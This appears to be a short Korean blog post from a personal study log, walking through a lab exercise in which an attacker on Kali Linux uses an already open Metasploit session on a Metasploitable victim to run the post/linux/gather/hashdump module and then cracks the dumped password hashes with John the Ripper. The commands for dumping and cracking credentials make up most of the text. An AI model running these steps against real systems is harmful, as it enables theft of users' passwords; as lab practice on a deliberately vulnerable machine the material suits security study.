Self-Improvement

세션을 이용한 post/hashdump (패스워드 크랙) 실습 본문

Kali Linux/Metasploitable

세션을 이용한 post/hashdump (패스워드 크랙) 실습

JoGeun 2018. 10. 21. 13:22

*세션을 이용한 post/hashdump(패스워드 크랙실습
 Attacker : kali 
 Victim     : metasploitable
 
 ※Victim에 여러 취약점 공격을 통하여 Session이 연결되어 있어야함
 
 (kali)
 msf > sessions



 msf > use post/linux/gather/hashdump
 msf > show options



 msf > set session 1
 msf > show options



 msf > exploit
 msf > exit -y
 #john /root/.msf4/loot/20180105141842_default_192.168.10.134_linux.hashes_958442.txt



툴을 이용하여 해당 파일의 암호를 크랙을 하면 된다.